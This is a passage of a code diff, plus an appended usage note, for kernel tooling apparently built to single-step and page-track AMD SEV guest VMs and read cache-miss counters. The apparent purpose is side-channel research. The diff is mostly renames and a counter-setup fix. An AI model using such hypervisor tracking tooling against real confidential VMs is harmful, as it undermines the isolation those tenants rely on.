https://lore.kernel.org/all/cover.1632171478.git.maciej.szmigiero@oracle.com/T/#u + //Thus we use instead of + //iterat_max = vcpu->kvm->memslots[0]->memslots[0].base_gfn + // + vcpu->kvm->memslots[0]->memslots[0].npages; + struct rb_node *node; + struct kvm_memory_slot *first_memslot; + node = rb_last(&(vcpu->kvm->memslots[0]->gfn_tree)); + first_memslot = container_of(node, struct kvm_memory_slot, gfn_node[0]); + iterat_max = first_memslot->base_gfn + first_memslot->npages; + for (iterator=0; iterator < iterat_max; iterator++) + { + idx = srcu_read_lock(&vcpu->kvm->srcu); + slot = kvm_vcpu_gfn_to_memslot(vcpu, iterator); + //Vincent: I think see here https://patchwork.kernel.org/project/kvm/patch/20210924163152.289027-22-pbonzini@redhat.com/ + if ( slot != NULL && kvm_slot_page_track_is_active(vcpu->kvm, slot, iterator, mode)) { + write_lock(&vcpu->kvm->mmu_lock); + kvm_slot_page_track_remove_page(vcpu->kvm, slot, iterator, mode); + write_unlock(&vcpu->kvm->mmu_lock); + count++; + } + srcu_read_unlock(&vcpu->kvm->srcu, idx); + } + + return count; } -EXPORT_SYMBOL(setup_perfs); +EXPORT_SYMBOL(sevstep_stop_tracking); int -sev_step_get_rip_kvm_vcpu(struct kvm_vcpu* vcpu,uint64_t *rip) +sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip) { return 0; } diff --git a/sevstep/sevstep.h b/sevstep/sevstep.h @@ -10,7 +10,6 @@ #include <linux/pid.h> #include <linux/psp-sev.h> - #define CTL_MSR_0 0xc0010200ULL #define CTL_MSR_1 0xc0010202ULL #define CTL_MSR_2 0xc0010204ULL @@ -47,21 +46,20 @@ bool sevstep_rmap_protect(struct kvm_rmap_head *rmap_head, bool sevstep_kvm_mmu_slot_gfn_protect(struct kvm *kvm, struct kvm_memory_slot *slot, uint64_t gfn, int min_level, enum kvm_page_track_mode mode); -bool __untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, +bool sevstep_untrack_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, enum kvm_page_track_mode mode); -bool __track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, +bool sevstep_track_single_page(struct kvm_vcpu *vcpu, gfn_t gfn, enum kvm_page_track_mode mode); -bool __reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); -bool __clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); +bool sevstep_reset_accessed_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); +bool sevstep_clear_nx_on_page(struct kvm_vcpu *vcpu, gfn_t gfn); -long kvm_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); -long kvm_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); -void sev_step_handle_callback(void); +long sevstep_start_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); +long sevstep_stop_tracking(struct kvm_vcpu *vcpu, enum kvm_page_track_mode mode); uint64_t perf_ctl_to_u64(perf_ctl_config_t *config); void write_ctl(perf_ctl_config_t *config, int cpu, uint64_t ctl_msr); void read_ctr(uint64_t ctr_msr, int cpu, uint64_t *result); -void setup_perfs(void); +void sevstep_setup_pmcs(void); -int sev_step_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip); +int sevstep_get_rip_kvm_vcpu(struct kvm_vcpu *vcpu, uint64_t *rip); diff --git a/sevstep/uspt.c b/sevstep/uspt.c @@ -225,7 +225,7 @@ _perf_state_setup_retired_instructions(void) retired_instructions_perf_config.EventSelect = 0x0c0; retired_instructions_perf_config.UintMask = 0x0; retired_instructions_perf_config.En = 0x1; - write_ctl(&retired_instructions_perf_config,batch_track_state.perf_cpu, CTL_MSR_0); + write_ctl(&retired_instructions_perf_config, batch_track_state.perf_cpu, CTL_MSR_0); } @@ -236,17 +236,17 @@ _perf_state_update_and_get_delta(uint64_t 
current_event_idx) { uint64_t current_value; - // check if value is "cached" + /* check if value is "cached" */ if (perf_state.delta_valid_idx == current_event_idx) { if (current_event_idx == 0) { read_ctr(CTR_MSR_0, batch_track_state.perf_cpu, &current_value); perf_state.idx_for_last_perf_reading = current_event_idx; - perf_state.last_perf_reading = current_event_idx; + perf_state.last_perf_reading = current_value; } return perf_state.delta; } - // otherwise update, but logic is only valid for two consecutive events + /* otherwise update, but logic is only valid for two consecutive events */ if (current_event_idx != perf_state.idx_for_last_perf_reading+1) { printk_ratelimited(KERN_CRIT "_perf_state_update_and_get_delta: " "last reading was for idx %llu but was queried for %llu\n", @@ -377,7 +377,7 @@ uspt_batch_tracking_handle_retrack(struct kvm_vcpu* vcpu, /* made progress, retrack everything in backlog and reset idx */ for (i = 0; i < batch_track_state.gfn_retrack_backlog_next_idx; i++) { - __track_single_page(vcpu, + sevstep_track_single_page(vcpu, batch_track_state.gfn_retrack_backlog[i], batch_track_state.tracking_type); } diff --git a/test/kvm.c b/test/kvm.c @@ -276,7 +276,7 @@ main(int argc, const char **argv) if (cachepc_fd < 0) err(1, "open"); /* init L1 miss counter */ - arg = 0x000064D8; + arg = 0x002264D8; ret = ioctl(cachepc_fd, CACHEPC_IOCTL_INIT_PMC, &arg); if (ret == -1) err(1, "ioctl fail"); diff --git a/test/sev-es.c b/test/sev-es.c @@ -485,7 +485,7 @@ main(int argc, const char **argv) if (ret != 12) errx(1, "KVM_GET_API_VERSION %d, expected 12", ret); // Init L1 miss counter - arg = 0x000064D8; + arg = 0x002264D8; ret = ioctl(cachepc_dev, CACHEPC_IOCTL_INIT_PMC, &arg); if (ret < 0) err(1, "ioctl fail"); diff --git a/test/sev.c b/test/sev.c @@ -493,7 +493,7 @@ main(int argc, const char **argv) if (ret != 12) errx(1, "KVM_GET_API_VERSION %d, expected 12", ret); // Init L1 miss counter - arg = 0x000064D8; + arg = 0x002264D8; ret = ioctl(cachepc_dev, CACHEPC_IOCTL_INIT_PMC, &arg); if (ret < 0) err(1, "ioctl fail");
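Editor's note: all three test programs switch their INIT_PMC argument
from 0x000064D8 to 0x002264D8, explicitly requesting the host-only,
kernel-only counting that cachepc_init_pmc() previously hard-coded. A
hypothetical end-to-end usage sketch — the device path is an
assumption, the diff only shows the resulting file descriptor:

	#include <err.h>
	#include <fcntl.h>
	#include <stdint.h>
	#include <sys/ioctl.h>
	#include <unistd.h>

	#include "cachepc/uapi.h" /* for CACHEPC_IOCTL_INIT_PMC */

	int
	main(void)
	{
		uint32_t arg;
		int fd, ret;

		/* device path is an assumption, not shown in the diff */
		fd = open("/dev/cachepc", O_RDONLY);
		if (fd < 0) err(1, "open");

		/* index 0, host-only, kernel-only, event 0x64, unit mask 0xD8 */
		arg = 0x002264D8;
		ret = ioctl(fd, CACHEPC_IOCTL_INIT_PMC, &arg);
		if (ret == -1) err(1, "ioctl fail");

		close(fd);
		return 0;
	}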